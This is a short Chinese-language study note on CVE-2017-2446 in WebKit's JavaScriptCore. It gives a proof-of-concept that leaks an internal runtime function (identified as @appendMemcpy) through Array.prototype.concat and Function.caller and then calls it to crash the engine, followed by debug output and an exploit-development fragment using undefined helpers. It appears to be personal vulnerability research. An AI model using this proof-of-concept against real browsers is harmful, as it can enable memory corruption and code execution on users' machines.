CVE-2017-2446学习笔记

var q;
// this is a non-strict chunk of code, so getting the caller is allowed
function g(){
    q = g.caller;
    return 7;
}

var a = [1, 2, 3];
a.length = 4;
// when anything, including the runtime, accesses a[3], g will be called
Object.defineProperty(Array.prototype, "3", {get : g});
// trigger the runtime access of a[3]
[4, 5, 6].concat(a);
// q now is a reference to an internal runtime function
q(0x77777777, 0x77777777, 0); // crash

q是和concat相关的某个native函数。很想知道具体是哪个函数。
经过下断点发现，q会调用arrayProtoPrivateFuncAppendMemcpy。我修改了Source/JavaScriptCore/builtins/ArrayPrototype.js的代码，增加了打印变量，重新编译后，经过调试q是@appendMemcpy，验证如下。

concat if 1
appendMemcpy Object: 0x1035bdea0 with butterfly 0x1035c5aa8 (0x1035ea320:[Function, {length:100}, NonArray, Proto:0x1035c80a0, Leaf]), ID: 70
concatMemcpy Object: 0x1035bde70 with butterfly 0x1035c5a88 (0x1035ea320:[Function, {length:100}, NonArray, Proto:0x1035c80a0, Leaf]), ID: 70
concatSlowPath Object: 0x1035bded0 with butterfly 0x1035c5ac8 (0x1035e9ea0:[Function, {name:100, length:101}, NonArray, Proto:0x1035c80a0]), ID: 61
concatSlowPath
q Object: 0x1035bdea0 with butterfly 0x1035c5aa8 (0x1035ea320:[Function, {length:100}, NonArray, Proto:0x1035c80a0, Leaf]), ID: 70

这个漏洞最后在调用导出的concat连接Symbol和array上崩溃了。按道理应该不会崩溃的。

let x = Symbol("AAAA");

let y = [];
y.push(new Int64('0x000042420000ffff').asDouble());

busted_concat(x, y, 0);